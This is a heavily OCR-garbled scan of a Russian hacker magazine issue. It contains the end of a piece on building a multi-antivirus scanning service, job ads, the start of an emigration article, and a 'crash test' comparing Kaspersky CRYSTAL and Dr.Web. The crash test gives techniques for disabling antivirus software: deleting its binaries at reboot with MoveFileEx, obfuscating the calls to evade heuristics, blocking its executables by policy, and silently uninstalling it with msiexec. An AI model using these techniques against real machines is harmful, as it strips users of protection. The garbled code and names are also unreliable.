Тгоіап.ЫРІгкЬ-ПЗ 


Казрегзку 


|Тго]ап-Р5Ѵі/,ѴѴіп32Т<1РіпсК.атЬ 



Оопе! 6/71оип<1 (в55&) 
АЫип^! а ѵіш5, 1 ^агапіее 
[ СЬ«к опд игк№І I 



сіазз САѵ : риЫіс СОЬ]'есС{ 

ѵоісі зСагССІіеск (сопзС ОЗСгіпд &іЫате) ; 
ргіѵаСе : 

СМар<СЗЦгіпд , СЗСгіпд > аѵз; 

СЬізІкСКезиІСРаіг > гезиШз; 

СЗСгіпд ііІеЫате; 

іпііпе САѵРгосезз* сгеаТеРгосезз ( ) ; 

СѴігІпіо іпііпе рагзеОиТриТ ( 

сопзС СЗСгіпд &аѵЫате, 
сопзС СЗСгіпд &оиСри1:) ; 

зідпаіз : 

ѵоісі опАѴВопе ( сопзС СЗСгіпд аѵВате, 
сопзС СЗСгіпд аѵКезиІС) ; 
ргіѵаСе зІоСз : 

ѵоісі опАѵРіпізкесі (САѵРгосезз *зепсіег, 
сопзС СЗСгіпд &аѵ, 
сопзС СЗСгіпд &оиЦриЦ , 
сопзС іпС ехіССосіе) ; 

}; 

Разберем код по порядку. За запускантивирусову насотве- 
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СЗІігіпд аѵЫате = аѵз . :Еіп(і (аѵ) .ѵа1ие() ; 
і:Е ( аѵЫате . ізЕтр^у ( ) ) { 

дВеЬид ( ) « "[-] ІІпкпоѵ^п ргосезз іЕіпізІіесі" ; 
геЕигп; 

} 

аѵзКетаіпз-- ; 

СѴігІп^о іп:Ео = рагзеОиЕрик (аѵ, оиЕриЕ) ; 
і:Е ( ! іп:Ео . ізІПіЕо ) { 

ѵ\[гі1:еКези11: (аѵЫате, "ЕККОК" ) ; 
геЕигп; 

} 

і:Е ( ! іп:Ео . ізІпіЕесЕесі ) 

ѵ\?гіЕеЕези11: (аѵЫате, "ОК" ) ; 

еізе { 

ѵ^гіРеКезиІЕ ( аѵЕате , іп:Ео . сіезсгірЕіоп) ; 
аѵзЕоипсі++ ; 

} 

(іеІеЕе зепсіег; 

і:Е ( ! аѵзКетаіпз ) { 

дВеЬид ( ) << епсіі << епсіі << "Вопе, " 

<< аѵзЕоипсі « "/" << ЕоВаІАѴз « "іоипсі! 
дВеЬид ( ) « епсіі « "КапкоК, Ах-Зоік.Ки, 
Киззіа, 2 010 " ; 
ѵ^^гіЕеЕооЕег ( ) ; 

ССогеАррІісакіоп: : ехіР ( ) ; 

} 



чает (функция зкагкСкеск ( ) : 

ѵоісі ОАѵ: : зкагЕСкеск (сопзО СЗкгіпд &ІЫате) 

{ 

дВеЬид ( ) << "[*] Зсаппіпд іііе"; 
ііІеЫате = іЫате; 

СЗкгіпдЕізк рагатз; 

САѵРгосезз *ргосезз; 

// ВіРВеіепсіег 

ргосезз = сгеакеРгосезз ( ) ; 

рагатз << " --аскіоп=ідпоге " 

<< ііІеЫате; 

ргосезз->зкагРРгосезз ( "Ьсізсап" , 
рагатз) ; 

рагатз . сіеаг ( ) ; 

} 

В параметр ІМате, как нетрудно догадаться, передается имя (фай- 
ла, который мы будем проверять. В данной статье я буду показывать 
взаимодействиетолько с одним антивирусом — дальшеты сможешь 
продолжить сам. 

Кстати говоря, знаешь, почему параметр передается в таком стран- 
ном виде (сопзк СЗСгіпд &1Ыате) ? Дело в том, что при передаче 
параметра по значению (то есть, например, просто СЗкгіпд іЫате) 
в стек переменная будет копироваться целиком, и это совсем не гуд, 
а при передаче по указателю (сзсгіпд іыате) в стек будет копиро- 
ваться только адрес переменной. Минус в том, что мы будем вынуж- 
дены работатьс ней как с указателем. Нуа передача по константной 
ссылке — сопзк СЗкгіпд &ІВате — это комбинация двух предыдущих 
методов. В итоге в стек копируется только указатель на переменную (то 
есть зізеоі (ѵоісі* ) ), и работаем мы с ней, какс обычной переменной. 
Не обошлось, конечно же, и без ложки дегтя — мы не можем изменять 
переменную в нашей функции. А оно нам надо? В данном случае — нет, 
нуа если понадобится, то можно завести переменную в самой функции 
и скопировать еетуда. «Некрасиво», — скажешьты. Можетбыть, зато 



очень эффективно — функция будет вызываться намного быстрее, если 
все переменные влезут в регистры (при условии юзанья фастколла). 
Ладно, лирику в сторону, поехали дальше. 

Наверное, ты обратил внимание на дВеЬид ( ) . Что это? Это потокдля 
вывода отладочной информации в 01: (оченьудобная вещь, между 
прочим). 

Далее мы создаем процесс и привязываем его к имеющимся слотам с 
помощью функции сгеаСеРгосезз ( ) . Она абсолютнотривиальна: 

САѵРгосезз *ргосезз = пеѵ\? САѵРгосезз; 
соппеск (ргосезз , ЗІСЫАЕ (опАѵЕіпізкесі 
(САѵРгосезз* , СЗкгіпд , СЗкгіпдДпк) ) , 

ккіз , ЗЕОТ (опАѵЕіпізкесі (САѵРгосезз* , 
ОЗкгіпдДЗкгіпд, іпк) ) ) ; 
гекигп ргосезз; 

Кактолько процессзавершается, начинаетсвою работу слот 
опАѵЕіпізкесі ( ) (см. врезку слева) 

И снова введутебя в курс дела: аѵз — это ОМар из 
куресіеі СРаіг<СЗкгіпд , СЗкгіпд > СКезиІкРаіг; 

Он содержит пары «имя процесса; название антивируса» для простого 
распознавания завершившегося процесса. 

Одна из важнейших функций в нашей софтине — рагзеОикрик ( ) . Как 
видно из названия, она парсит вывод антивируса при его завершении и 
выдает результат сканирования. Выглядит она так: 

СѴігІпіо іпіо; 

іпіо.ізіпіо = іпіо . ізіпіескесі = іаізе; 
іі ( аѵЕате == "Ьсізсап" ) { // ВікВеіепсіег 

іі ( оикрик . іпсіехОі ( " ок" ) > 0 ) { 
іпіо.ізіпіо = кгие; 
гекигп іпіо; 

} 

іпк іпсіех = оикрик . іпсіехОі ( " іпіескесі: " ) ; 
іі ( іпсіех == -1 ) 
гекигп іпіо; 

іпіо . сіезсгіркіоп = оикрик.тісі (іпсіех + 9, 
оикрик . іпсіехОі ( " \п" , іпсіех) - 
іпсіех - 9) .кгіттесі() ; 
іпіо.ізіпіо = іпіо . ізіпіескесі = кгие; 

} 

Тутпроисходит самый обыкновенный разбор строки. Если мы не находим 
какого-то ключевого слова — значит, ошибка. Если находим слово, со- 
ответствующее отрицательному результату (то есть, файл не заражен) — 
возвращаем ОК. Иначе — копируем вывод антивируса и возвращаем его. 
Вернемся кслоту спАѵЕіпізЬесі ( ) . После парсинга вывода мы пишем 
результат в файл в виде НТМЕ-таблицы для удобного вывода в браузер. 
Все! Костяксервиса создан. Встает вопрос: «А как на этом можно зара- 
ботать»? На мой взгляд, естьдва варианта: 

1. «Приватная» версия сервиса. Не отправлять на проверку файлы за 
небольшую денежку. У меня — 1 центза 1 антивирус. Как реализовать? 
ІрІаЫезтебе в руки! 

2. Реклама. Можно размещать баннеры тематических форумов/сервисов 
и/или контекстную рекламу оттого же гугла. 

3. Продажа лицензионных версий антивирусов. 

ЗАКЛЮЧЕНИЕ 

Как показала практика, самый напряжный момент в разработке — со- 
здание сайта. Ненавижу РНР! После понятного и логичного С++ разра- 
ботка на РНР + А)ах подобна пытке, но в итоге использование в качестве 
А)ах-библиотеки 5а)ах, а 50Е-базы ЭОЕКе решило все мои проблемы. 

На этом позволь свернуть мое краткое повествование и пожелатьтебе 
удачной разработки. А будут вопросы — пиши. Мыла не указываю, пос- 
кольку настоящий хакер всегда и так сможет меня найти :).. ~5г 
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Приглашаем специалистов 

в наш сплоченный и творческий коллектив! 

Объявляется конкурс на занятие вакантных должностей для 




«Инженер телекоммуникационных сетей» 



требования: 

• опыт работы в телекоммуникационных компаниях 

• знание основных протоколов Интернет 

• знание ІІпіх РгееВЗО, СІЗСО 103 

• знание языков программирования С, РегІ 

• опыт работы с сетевым оборудованием. 



Обязанности: 

• настройка сетевого оборудования 

• поддержание функционирования серверов и маршрутизаторов 



Кандидатам на занятие этой должности нужно заполнить 
анкету на ѵѵтѵ.гт1ги/епгірІоу_асІппіп 



«Инженер технической поддержки» 



Требования: 

• опыт работы в телекоммуникационных компаниях 

• знание основных протоколов Интернет 

• опыт работы с сетевым оборудованием. 



Обязанности: 

• техническая поддержка абонентов по телефону 

• удаленная диагностика неисправностей в сети связи 

• настройка и проверка сетевого оборудования. 



Кандидатам на занятие этой должности нужно 
обратиться к Горобинской Наталье 



142784, Московская обл., Ленинский р-н, 
п. Румянцеве, Бизнес Парк, стр.1, офис 402Б 



В ціиі^ільмом офміЩ (^МДДЩШМа 






МАІѴѴАКЕ 



■ ■сіѳѳопіз сІееопі5(Вдтаі1.сот 




Краш-тест 

отечественных 

антивирусов 



Суровая проверка грандов АѴ-индустрии: 
победивших нет! 




Какобычнотестируютантивирусы? Прогоняютих на специально 
заготовленных зловредах, пытаются всячески обойти эвристику, 
выбраться из песочницы... Такихтестов полно в Сети, но в этот раз все 
будет иначе. Мы будем проводить краш-тесты. Мы будем грубо ломать 
и выводить из строя самые крутые аверские поделки и в итоге узнаем, 
кто из них оказался самым крепким. 



Сегодняшнее тестирование будут прохо- 
дить двеантивирѵсные программы. Пер- 
вый испытуемый — Казрегзку СКУ5ТАС. Это 
ПО разрабатывалось специально для ком- 
плексной защиты пользовательского ком- 
пьютера. В Кристале, помимо классического 
сканера и резидентного проактивного 
модуля, есть также средства родительского 
контроля, шифрование данных, менеджер 
паролей, которые для нас особой ценности 



сегодня не представляют. Вторым кандида- 
том на уничтожение будет Вг.ѴѴеЬ ЭесигКу 
Эрасе Рго. Его функционал чуть беднее. Нет 
менеджера паролей, виртуальной клавиа- 
туры и прочихполезныхи неоченьфич. 
Антивирус предназначен для комплексного 
противодействия интернет-угрозам в соче- 
тании с дополнительной защитой от сетевых 
атак благодаря встроенному брендмауэру. 
Оба антивируса очень популярны в России, 



а Казрегзку еще и входит в мировую пятерку 
самых продаваемых программ для защиты 
от зловредов. 

ПРИНЦИП ТЕСТИРОВАНИЯ 

Для проверки антивирусов на прочность мы 
разработали пять собственных тестов. Неко- 
торыетесты представляют собой специаль- 
но написанные программы, другие можно 
выполнить вручную с помощью стандартных 
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Казрегзку СНУВТА^ 



Справка 






Запускается потенциально опасная программа 
Тё 5Т,ЕХЁ . Программа не имеет цифровой 
подписи^ обладает высоким рейтмигои 
опасности. 

Доверяете ли вы этой программе? 



Ф Да 

Раэрешить исполнение программы 

ф Ограничить 

Разрешить исполнение программы, заблокировав 
только опасньге операшіи 

^ Нет 

Запретітгь і^олнение программы 



Вы используете пробную версию. 
Рекомендуется приобрести коммерческую версию. 



Потенциально опасная программа. Дейс- 



Кр и ста л л запустился. Полет нормальный! 



твительно. есть у нее такси недостаток. 



инструментов ѴѴіпсІоѵѵз. Кстати, все испытания прово- 
дятся в ѴѴіпсІоѵѵз ХР Ргоіеззіопаі 5РЗ. 

За прохождение каждого теста будет выставляться 
оценка по пятибальной системе — совсем как в школе. 
Единицы, конечно, мы никому ставить не будем, ной 
завышать баллы за способность квыживанию — нев 
наших правилах. В конце мы подсчитаем среднеариф- 
метическое всех оценок и посмотрим, кто оказался 
самым стойким. 

Теперь немного о самих тестах. Так как мы тут проводим 
не абы что, а краш -тестирование, то и испытания у нас 
будут соответствующие. Основная их цель — вывести 
из строя антивирусное ПО как можно незаметнее для 
пользователя. Если в результате выполнения того или 
иного теста защитные функции наших кандидатов 
«на уничтожение» перестали работать, то антивирь 
получает жирную двойку. В противном случае мы будем 
смотреть, как ПО справилось с проблемой. Если перед 
смертью ему удалось выдать какое-нибудь сообще- 
ние— начисляем трояк. Как уже было сказано выше. 



@Ів РфтаЕ Цт Цф 

іало ЗАПИСИ куриілА: ь/і7/20і.а 
дейсгѵид 3;0й:0^: IN5ТА^^, 






--- начало записи і 
Начало _ . _ . _ 

начало действия І:й6:ОгЕ 5у51Й№ОІеІеГ.444РСгОО^А5О_нІ7РЕ„0О*Л_Н75САбЗО57АО. 

Завершай на дайствня 3:С4;0і2: 5уз(іяіРо1^.444РС20О_зСА.5йі„47ГС_@РбА_в7$САіБЭ057АО. Код возврата 1. 
начало действия саиІОГіРІ1І5РОІ<»ег.444РС^ОО_СА5О_47РЕ_8оед^075САвЗО57АО. 

заваршанне действия ^:06:02: соттопРІ1а5Го1і^вг,444РС200і_СА5О_47РЕ_вОйя^7^СА^Зй57Ай. код воі врата і. 
Начало действия 3; 0^:03; Сіэ™іоЛРІ1е5РО1(*егрЭ30сг^4_$Р9^45ое^5РЕ9_РДе177773Е5е, 

Заваршанне действия 3:06^02^ ссшіопР^1е‘5Ро1сІег.ззйС2бЁ4_№№_4^йЕ_В№8_гя.В[і77773Е5С. код, возврата і. 
Начало действия 3;Е>$:03; :есю.ЕЕтирріР.. 
гетзетирйіг епт гу роігл 

нвіаасРгорагту ог^дІпаЮатаЬаза: с:\)Лііооѵ<5Чіп5са11сгѴі4айа.(Л5'( 

45 1 зет: Р[' Оретту киэетцррзиі с5\аднронДЕЛ5ха11ег\ 

5«5аЕирРіг гахигп роІПЕ 

Завершен не действия 3:04103? 5^ткЕ.5ЕтороіРр код аовврата 1. 
начало действия Іі 06:03: АррЗеагсІп. 

Завершение действия 3:04:03; АрірЗеагсН. код возврата 1. 
начало действия 3:06:03? сИіескне^-(зтг'урепп1аз4агк5. 

Заваршанне действия 3:04:03; СИесНіПедтвсгуРагіііізіІопг. код возврата 1. 
начало действия з:06:03: с^ 1 есЬпеЬоотре^^сI 1 ^^ 9 . 

Завершение действия 3:04:03: СИаскйеЬо«Реп(1'(пд. Кдд іоі врата 1 . 
начало действия 3;04;03; р^псІАрр. 

РІ псІАрр япцпі оиечіл ехнаше : бііі749аз 2 3 зг^зГ’бЗсгбза 3772 з 5 342сзеб74і 5іаі4із 6Ъ 
завершение действия 3:04:03: р-ігсілррь код возврата 1. 
начало действия з:йб:оз? ёг г от АррАилл1пд5Ііо«'. 

ЧЗІ <5С:А4} [03;О4;0Э;015] : Про грамма; Кавреггку СйУЗТАі — для продол* вн»іл установки необходимо і 

Для проАРЛнения установки необходимо выгруіита Ка^рагзку СКУ5ТД^. 
завершение действия 3:04:03: етгогАрраипліпд 5 іі№. иод возврата з. 
завершение действия 3:04:01 : Ін5ТА^^. код возврата 3. 

Ргорвг^уГі): «апиГасСигег - лаборатория Касперского 
рторегтусзі: РГОЙОСТСОСІе - {1А59044А-12 а9-4Ё9Ё-.№4"04ѲР11ВОВСРР> 

Ргорегі;у(5 ] : Рго(іиссСапдуаде * ІОЛЭ 
ргорегтуС5і : ргоОистналіе - ка5рет$ку слѵ5ТА^ 

Ц5): Ргосіиссѵегііоп • 9.0.0.100 

,55: ордгасіесобе - {9с78АД9В-0754-4АО5-дг0Р-8гсЗв7сОДС4в) 

,53: РгосІIіси*ап1е^чон * казрег9):у Сйт5ТАк 

,53: Рго0ис^^»ая1е^5ЕН * Каврег5);у СИѴіТАк 

,51: Ргосіиетмапіе_і:м5 * казрегзку СйтзтАо. 

,51: ЁггогОіаІод - ЕггогЫаІод 
.53: оеТаиТтшРопт - наіпоіаЗо^Ропг 



І 






Тайная деинсталляция закончилась обломом 



краш-тестсв будет всегс пять. Первый тест будеттупс 
пытаться удалить самые важные бинарные файлы дис- 
трибутива антивируса. Нс не преете удалить, а удалить 
при загрузке ОС с пемещью специальней АР I- функции. 
Втерей будет делать то же самое, но при этом еще и 
хитро шифровать имя удаляемого файла, чтобы анти- 
вирь не догадался, что его хотят стереть с практически 
собственного жесткого диска. Третий тест, опять же, 
удаляетжизненно важные файлы, но при этом скрывает 
это, маскируя вызов смертоносной АРІ-функции под 
совершенно безобидный код. 

Четвертое и пятое испытание стоят особняком, пос- 
кольку будут выполняться с помощью стандартных 
средств ОС ѴѴіпбоѵѵз — никаких специальных утилит 
мы писать не будем. Разумеется, при желании все 
это можно реализовать и программно. Итак, один из 
тестов будет запрещать запуск антивируса посредством 
политик безопасности, а второй попробует деинсталли- 
ровать ПО без лишнего шума и пыли. 

Итак, когда мы немного разобрались с тем, что будем 
делать, приступим непосредственно к краш-тестам. 

ТЕСТ №1 

Первый тест будет производиться с помощью специаль- 
но написанной утилиты. В командной строке мы переда- 
дим ей полное имя файла, который хотим удалить при 
следующей загрузке ОС. Программа вызовет систем- 
ную функцию МоѵеРіІеЕх, которая может перемещать 
файлы и папки. Первый ее параметр — это полное имя 
перемещаемого файла, второй — куда будем переме- 
щать, а третий — флаг, который задает некоторые опции 
перемещения. Если второй параметр оставить пустым, 
то есть передать МОЕЕ вместо строки с новым местом 
хранения, а в качестве флага установить значение 
М0ѴЕЕІЕЕ_0ЕЕАУ_0МТІЕ_РЕВ00Т,то нужный нам файл 
будетудален во время загрузки 00. 

Все просто. Всего одна функция, и никакого хитроум- 
ного кода. Такую ути литку может написать даже ученик 
средней школы. Теперь проверим, как она подействует 
на наши антивирусы. Первым по списку идет Каврегзку 
СВУ5ТАЕ. Если посмотреть в менеджер процессов, 
то мы увидим, что Каспер два раза запустил аѵр.ехе. 
Одна копия запущена с системными привилегиями, а 




> ѵѵагпіпд 

Не используй 
нелицензионные 
версии антивирусов 
в своем сервисе и не 
хостись в России. 




> ІП^О 

РЕ5РЕ0Т 
Группе И-3-1 
(Прикладная 
Математика) МГТУ 
«Отанкин». 

□ іеНагб, УаевО, теіаі 
АзесЬка.Ри сот- 
типТу 
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МАІѴѴАКЕ 




ТЕСТ №2 



I 






Для шифрования пути кфайлу во второмтесте и маскировки передачи 
флага МОѴЕРІІЕ_ОЕІАУ_иМТІІ_КЕВООТ функции МоѵеРіІеЕх в 
третьем использовался специальныйтрюк, который позволяетобойти 
эвристические анализаторы антивирусного ПО. Если мы сохраним 
ключ для расшифровки некой строки в памяти программы напрямую (в 
виде константы или передаваемогозначения),тоанализаторы кода смо- 
гут отследить всю цепочку использования этого ключа и в конце получить 
исходную информацию в раскриптованном виде. 

Но ключ можно сформировать из двух частей: базовая и псевдослу- 
чайная части. Базовая часть — это просто число, которое хранится в 
памяти. Весь фокус в псевдослучайной части. Ее надо сгенерировать 
так, чтобы эвристическая машина не смогла проанализировать код 
генерации. Сделать это можно, вызвав некоторую системную функцию 
ста КИМИ параметрами, которые приведут коднозначному результату: 

ВШКВ рзеисіоКапсіотВідіЦ (сопзС ВШКВ йідіЦ) 

{ 

^ореп ( "(іззк1:Ез‘ зйік" , "г " ) ; 

БШКВ егг = : :СекЬазкЕггог ( ) ; 



гекигп сіідіР + егг; 



} 



Функции рзеибоРапсІоппВідіІ; передается базовая часть ключа. После 
этого мы пытаемся открыть несуществующий файл, в результате чего 
получим вполне определенный кодошибки. Прибавляя этоткод к 
базовой части ключа, мы лишаем эвристические анализаторы всякой 
надежды понять, что же все-таки произошло. В результате чего анти- 
вирус не может расшифровать строку, а, следовательно, и предъявить 
какие-либо претензии. 



вторая — с правами активного в данный момент пользователя. Уда- 
лять будем именно этот файл, который по умолчанию лежит в папке 
«%ргодгатб[е5%\Ка5рег5ку ЕаЬѴКазрегзку СВУ5ТАЕ\». Запускаем 
утилиту, передав ей в качестве одного из параметров полное имя 
экзешника и ... Кристал начал ругаться на нашу тестовую утилиту, 
определив ее рейтинг опасности как «высокий». Если бы это был 
реальный зло вред, то пользователю пришлось бы решать, разрешить 
подозрительной программе выполниться или нет. Если все-таки дать 
свободу нашей утилите, то после ребута системы антивирус не запус- 
кается. Программа сделала свое дело и удалила главный бинарник 
Касперского. В случае запрета выполнения подозрительной тулзы 
все будетхорошо — аѵр.ехе останется на своем месте и по-прежнему 
будет радовать пользователей красивой иконкой в трее. 

Итак, Казрегзку СВУ5ТАЕ прошел первое испытание, но, к сожа- 
лению, всего лишь на троечку. Очень часто пользователи жмут на 
кнопку «Да» не читая, что там пишут. 

Следующее защитное ПО — Ог.ѴѴеЬ ЗесигКу Зрасе Рго. В отличие от 
СВУ5ТАЕ, Доктор Веб состоит из множества исполняемых ехе-фай- 
лов, каждый из которых ответственен за свою функцию. Но удалить 
мы попробуем самый главный бинарь, который, как и в Каспер- 
ском, запускается от имени системы — бѵѵепдіпе.ехе. Тестовая 
утилита удаления отработала без проблем. Доктор даже не писк- 
нул. Но посмотрим, что будет после перезагрузки. А после нее все 
осталось на своих местах — анитвирус какновенький! Ну что же, 
попробуем стереть какой-нибудь другой важный файл, например, 
утилиту обновления или базы с сигнатурами. После нескольких 
запусков смертоносного кода и перезагрузки компьютера Доктор 
остается жив, и поэтому получает за первое испытание твердую 
пятерку. Никакого шума, никаких вопросов к пользователю. Просто 
не удаляется :). 



Второй краш -тест очень похож на первый, нос од ним единствен- 
ным отличием — путь к удаляемому файлу мы передаем в зашифро- 
ванном виде. Процедура шифрования тоже не совсем простая. Мы 
используем специальный трюк, чтобы обмануть эвристики наших 
антивирусов. Подробнее об этом можно почитать во врезке. А пока 
посмотрим, как справятся с этим испытанием Касперский и Доктор 
Веб. 

Первый в очереди — Казрегзку СВУ5ТАЕ. Предварительно зашиф- 
ровав путь к аѵр.ехе, мы передаем его нашей утилите. Реакция 
Кристала на второй тест полностью совпадает с реакцией на пер- 
вый. Антивирус предложил выбрать, что делать с подозрительной 
программой. В случае, если мы разрешаем ее выполнение, после 
перезагрузки Казрегзку не загрузится. Итог: второе испытание 
Каспер тоже проходит на тройку. 

Ситуация с Ог.ѴѴеЬ полностью идентична предыдущей. Все попытки 
удалить какие-либо файлы, требуемые для его работы, потерпели 
неудачу. Не удалялся даже банальный исепзе.ІхП За такую стой- 
кость Доктор Веб получает пять. 

ТЕСТ №3 

Третье испытание также будетудалять нужные для антивирусного 
ПО файлы, но при этом будет маскировать сам факт попытки удале- 
ния. Как говорилось выше, для того, чтобы стереть файл при загруз- 
ке ОС, нужно функции МоѵеЕіІеЕх в качестве одного из параметров 
передать флаг МОѴЕЕІЕЕ_ВЕЕАУ_ПМТІЕ_ВЕВООТ. Именно этот флаг 
мы и замаскируем под нечто безобидное, что позволит усыпить 
бдительность эвристики (см. врезку). 

На за пуск теста с маскировкой удаления Казрегзку СВУ5ТАЕ никак 
не прореагировал. Сообщение, в котором бы говорилось об опас- 
ной программе, не появилось. Можетбыть, Кристал блокирует эту 
угрозу втихаря? Перезагружаем, и... нет. Касперский провалил этот 
тест. ПО не запустилось, аѵр.ехе исчез с жесткого диска без каких- 
либо следов. Маскировка удаления файлов принесла свои плоды. 
Анализатор кода СВУ5ТАЕ не смог распознать угрозу и поплатился 
за это. Результат: двойка и ничего, кроме двойки. А что же с Ог.ѴѴеЬ? 
Провалит ли он, наконец, хоть одно испытание? Как оказалось, нет. 
Доктор тверд, как скала. Никакие хитрые попытки удалить важные 
файлы его не берут. А все из-за того, что доступ ко всем нужным и 
ненужным бинарникам из дистрибутива Веба был заблокирован 
на уровне файловой системы. Такой подход решил все проблемы с 
вандализмом. Просто так поменять эти праваунасне получится, 
все гайки закручены очень крепко. Заслуженная пятерка. 

ТЕСТ №4 

Следующий тест мы будем проводить с помощью стандартных 
инструментов ѴѴіпбоѵѵз ХР Ргоіеззіопаі. В главном меню системы 
выберем пункт «Выполнить...» и впишем туда следующее: дребіЕ 
тзс. Откроется консоль с групповыми политиками. Там выберем 
«Пзег СопЬдигаЬоп», затем «АбтіпізІгаЬѵе Тетріаіез», «Зузіепп». 
Справа найдем «ВопЧгипзресіЬеб ѴѴіпбоѵѵз аррЬсаЬопз». Эта оп- 
ция позволяет запретить запуск определенных программ на основе 
их имени. 

Для Касперского мы будем блокировать аѵр.ехе. Прописав запрет 
на его запуск в политиках ѴѴіпбоѵѵз, мы перезагружаем компьютер 
и смотрим на результат. После старта системы Казрегзку СРУ5ТАЕ 
работает, какни вчем неб ы в ал о. Запустился не только сервис с 
правами системы, ной процесс с привилегиями текущего пользо- 
вателя. Похоже, это первая пятерка у Каспера. Поздравляем! 

С Ог.ѴѴеЬ ситуация чуть хуже. Блокирование запуска бѵѵепдіпе. 
ехе никак не повлияло на работу Доктора, а вот если прописать 
в политиках имя сканера, то он не запустится. Таким же образом 
парализуется работа ЗрІОегОиагб. Никакие сообщения при запуске 
какого-нибудь зловреда пользователю показаны не будут. Но стоит 
отметить, что защитные функции антивирус потерял не полностью. 



► 080 
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Введите текст, изображенный на картинке: 



Важно: когда Самозашита отключена. 

Зачем и почему нужно вводить капчу и 
отключать самозащиту — неясно. Проще 
согласиться :1 

Он выполнит действия, заложенные в настройках по 
умолчанию, например, бережно перенесет вирус в ка- 
рантин, но пользователь об этом, к сожалению, ничего 
не узнает. Доктор Веб получает четверку. 

ТЕСТ №5 

В пятом и последнем испытании мы попытаемся пол- 
ностью удалить защитное ПО с помощью штатного инс- 
таллятора. Но удалить так, чтобы пользователь ничего 
не заметил. Практически у всех современных инстру- 
ментов для развертывания приложений в системе есть 
так называемый «тихий режим», когда пользователю 
не задается никаких лишних вопросов. Вотспомощью 
этого режима мы будем тестировать антивирусы. 

Для «невидимой» деинсталляции Казрегзку СВУ5ТА1 
нужно выполнить следующую команду: тзіехес /риіеі: / 
ипіп5Іаи{1А59064А-12А9-469Р-99Р6-04ВП18ВВСРР}. 
Ключ /р и іеі означает, что пользователь не увидит ни 
одного окна, касающегося процесса анинсталла. Иден- 
тификатор в фигурных скобках уникален для установ- 
ленного дистрибутива Кристал. После выполнения этой 
команды Касперский не выдает никаких сообщений, 
касающихся попытки его удаления, но и сама деинс- 
талляция кактаковая завершается неудачей. Каспер 
справился с испытанием — без лишнего шума он пресек 
попытку несанкционированного удаления. Вторая 
пятерка. 

Для тестирования Вг.ѴѴеЬ была выполнена та же коман- 
да, с то йлишьразницей, что был заменен идентифика- 
тор дистрибутива. Через некоторое время после запуска 
тзіехес с нужными параметрами на экране появился 
диалог с предложением отключить модуль самозащиты 
и ввести капчу. В случае правильного набора цифро- 
вого кода Доктор исчезнет с компьютера пользователя 




Сканер работает. Все чисто 



навсегда. То, что Доктор Веб спросил разрешения об 
отключении самозащиты — это хорошо, но плохо, что 
он не сообщил нам причины, по которой самозащита 
отключается. Неопытный юзер может подумать, что так 
нужно, и с чистой совестью ввести капчу. В итоге Вг.ѴѴеЬ 
получаеттройку, поскольку непонятные окошки с непо- 
нятным текстом — дурной тон. 

итоги 

На этом все. Пять ужасных испытаний пройдены. 
Некоторые хуже, некоторые лучше. Но ни Казрегзку 
СВУ5ТА1, ни Вг.ѴѴеЬ ВесигЬу Брасе Рго не смогли сдать 
все тесты на отлично. Для большей наглядности можно 
посмотреть в таблицу с оценками и вспомнить, как это 
было. пг 



КАЗРЕРЗКУ СРУЗТАІ ѴЗ ОР.ѴѴЕВ 
ЗЕСВРІТУ ЗРАСЕ РРО 



Итоги: Доктор Веб оказался устойчивей ко всяким деструктивным выпадам в его 
сторону. Он хорошо защитил свои файлы на уровне ФС и смог противостоять жес- 
токим политикам безопасности ѴѴіпбоѵѵз. А его модуль самозащиты не позволит 
злоумышленникам тихо и незаметно удалить анти в и рус. 

Касперский справился ч^ьхуже. Главной проблемой для него стал замаскиро- 
ванный вызов МоѵеРіІеЕх с флагом М0ѴЕРІІЕ_ВЕ1_АУ_ВМТІІ_ВЕВ00Т. Итоговая 
оценка за краш -тестирование: КазрегзкуСВУБТАЕ — 3.6 балла, Вг.ѴѴеЬ Бесигку 
Брасе Рго — 4.4 балла. 

I 





КА8РЕЫ8КУ СКУ8ТАЕ 


ВК.\ѴЕВ 8ЕОТМТУ 8РАСЕРКО 


Тест №1 


3 


5 


Тест №2 


3 


5 


Тест №3 


2 


5 


Тест №4 


5 


4 


Тест №5 


5 


3 


Средний балл 


3.6 


4.4 
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СЦЕНА 



■ ■ Мария «МІІгіи» Нефедова ті^гіікагеаі. хакер. ги 



МИГРАЦИИ ІТ-ШНИКОВ 
СРЕДНЕЙ ПОЛОСЫ 

ГДЕ И КАК ЖИВУТ НАШИ ЗА ГРАНИЦЕЙ 



ХОРОШО ТАМ, ГДЕ НАС НЕТ 

Эту статью вполне можно было бы начатье про- 
странных рассуждений отом, что в России имеет 
место проблема утечки мозгов. Ксожалению, 
наша стобой сегодняшняя реальность такова, 
что молодые и талантливые специалисты все 
чаще бегут за рубежв поискахлучшейжизни. 

И можно было бы дол го растекаться по дре- 
ву, перебирая причины, приведшие ктакому 
печальному положению вещей, ища виноватых 
итакдалее, подавай признаем — всеэто было 
бы не слишком-то интересно, да и чтиво, в целом, 
получилось бы грустное, если не сказать, депрес- 
сивное. Поэтому мы и решили зайти с другой 
стороны, оставив поиски ответов на извечные 
вопросы «кто виноват?» и «что делать?» другим. 
Какизвестно, самой достоверной и интересной 
всегда является информация, полученная из 
первых рук,такчто мы напрямую пообщалисьс 
молодыми и не очень ІТ-специалистами, которые 
перебрались из России в самые разныеуголки 
мира. Ребята поведали нам, почему ониуехали 
из РФ, рассказали, насколько сложно им было, и 
с какими подводными камнями пришлось столк- 
нуться. Плюс кэтому, мы покурили форумы, блоги 
и прочие полезные ресурсы, в итоге собрав для 
тебя кучу самой разной информации. На выходе 
получился, конечно, нето чтобы мануал из серии 
«боѵѵіо», ведь двух одинаковых путей в эмигра- 
ции не бывает, и воспользоваться чужим опытом 
удается далеко не всегда. Но все же эта статья 
поможеттебе понять, с какой стороны вообще 
подходить к вопросу переезда в другую страну, а 
та кже да ст н е которое п ре дета в л е н и е о то м , ка к 
живется российскому ІТ-шнику за рубежом. Ну, а 
если переезд за границу не входитвтвои планы. 



то можешь отнестись к нижеизложенному как к 
очередной передачетелеканала Оізсоѵегу :). 

КАК ИСКАТЬ РАБОТУ ЗА РУБЕЖОМ? 

Пожалуй, это самый животрепещущий вопрос 
для каждого желающего «понаехать»: где и как 
искать работу за пределами РФ? Вариантов со- 
тни, и универсальных рецептов здесь нет, многое 
зависит отобразования, специализации, опыта 
работы, знания языков итакдалее. Опять же, 
одно дело, когда в твоем распоряжении имеются 
полезные зацепки и связи, и совсем другое, если 
их нет. Итак, представим, что их нет — в та ком 
случае клавиатурутебе в зубы, и вперед — в Сеть. 
Начинать поиски, конечно, стоите сайтов вакан- 
сий, притом какзарубежных,таки русскоязычных 
(на крупных ресурсахтипа бб.ги публикуется 
